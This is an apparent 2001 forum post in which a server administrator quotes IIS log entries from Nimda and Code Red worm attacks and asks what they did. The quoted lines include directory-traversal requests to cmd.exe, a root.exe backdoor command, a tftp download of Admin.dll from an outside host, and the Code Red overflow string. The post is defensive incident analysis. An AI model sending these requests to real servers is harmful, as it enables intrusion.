NImda/Code Red IIS log analysis questions

From: John Mack (jmack@p3.net)
Date: 12/18/01


From: jmack@p3.net (John Mack)
Date: 17 Dec 2001 16:57:43 -0800

Hello,
My servers are being repeatedly hit by CodeRed and Nimda attacks,
I think I got hit by CodeRed but a tool from Symantec claimed it
erradicated this virus. I'm all pathced up now so I guess I'm OK. I
have some questions about the IIS entries these worms leave behind and
I was hoping for some clarity on two items:

1)
These next 18 lines is a Nimda attack as described at:
http://www.cert.org/advisories/CA-2001-26.html. These 18 lines
appeared repeatedly in my IIS log files for several days. My concern
is the fist line (I discuss below)

2001-12-11 00:13:58 63.106.40.114 - 63.178.178.45 80 GET
/scripts/root.exe?/c+dir /c+dir 200 -
2001-12-11 00:13:58 63.106.40.114 - 63.178.178.45 80 GET
/scripts/root.exe?/c+tftp%20-i%2063.178.65.67%20GET%20Admin.dll%20Admin.dll
/c+tftp%20-i%2063.178.65.67%20GET%20Admin.dll%20Admin.dll 502 -
2001-12-11 00:14:01 63.106.40.114 - 63.178.178.45 80 GET
/scripts/Admin.dll - 401 -
2001-12-11 00:14:02 63.106.40.114 - 63.178.178.45 80 GET
/MSADC/root.exe?/c+dir /c+dir 403 -
2001-12-11 00:14:04 63.106.40.114 - 63.178.178.45 80 GET
/c/winnt/system32/cmd.exe?/c+dir /c+dir 404 -
2001-12-11 00:14:06 63.106.40.114 - 63.178.178.45 80 GET
/d/winnt/system32/cmd.exe?/c+dir /c+dir 404 -
2001-12-11 00:14:07 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir /c+dir 500 -
2001-12-11 00:14:07 63.106.40.114 - 63.178.178.45 80 GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/c+dir 500 -
2001-12-11 00:14:08 63.106.40.114 - 63.178.178.45 80 GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/c+dir 404 -
2001-12-11 00:14:10 63.106.40.114 - 63.178.178.45 80 GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/c+dir 403 -
2001-12-11 00:14:11 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir /c+dir 500 -
2001-12-11 00:14:11 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir /c+dir 404 -
2001-12-11 00:14:13 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir /c+dir 404 -
2001-12-11 00:14:15 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir /c+dir 404 -
2001-12-11 00:14:17 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir /c+dir 500 -
2001-12-11 00:14:17 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir /c+dir 500 -
2001-12-11 00:14:18 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir /c+dir 500 -
2001-12-11 00:14:18 63.106.40.114 - 63.178.178.45 80 GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir /c+dir 500 -

That first URL was "/scripts/root.exe?/c+dir /c+dir 200 -" and the
result was 200, meaning the request was succesful. What happened
here? What did IIS do? What action occurs when root.exe is run with
those specific parameters ? Is this harmful, did something bad
happen? Should I reformat my machine?

1)
The following one line is from my IIS log file and is the Code Red
worm as discussed at:
http://www.cert.org/incident_notes/IN-2001-09.html

2001-08-11 05:35:37 168.188.58.10 - 168.191.31.159 80 GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
400 -

This request registered as a '400' (bad request), this basically means
this attack was unsuccessful?

Thanks for any info,

-john